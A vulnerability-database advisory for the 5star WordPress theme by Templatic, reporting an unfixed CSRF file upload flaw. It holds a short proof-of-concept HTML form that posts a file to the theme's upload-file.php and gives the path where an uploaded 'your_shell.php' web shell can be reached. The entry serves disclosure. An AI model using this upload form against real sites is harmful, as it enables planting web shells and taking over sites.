5star by Templatic – CSRF File Upload | Theme Vulnerabilities

Description

The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.

Proof of Concept

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php">
<input name="uploadfile[]" type="file" />
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php

Affects Themes

No known fix

References

URL

https://en.0day.today/exploits/22091

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jje Incovers

Verified

No

WPVDB ID

80537e03-34fd-47c7-8a8c-6002b109a726

Timeline

Publicly Published

2014-08-01 (about 11 years ago)

Added

2014-08-01 (about 11 years ago)

Last Updated

2021-01-13 (about 5 years ago)

Other

Published

Title

Published

2022-10-12

Title

Optinly < 1.0.16 - CSRF

Published

2025-04-09

Title

WP Map Route Planner <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-03-01

Title

ElasticPress < 3.5.4 - Cross-Site Request Forgery

Published

2024-02-01

Title

Orbit Fox by ThemeIsle < 2.10.30 - Connected API Keys Update via CSRF

Published

2025-04-24

Title

occupancyplan <= 1.0.3.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting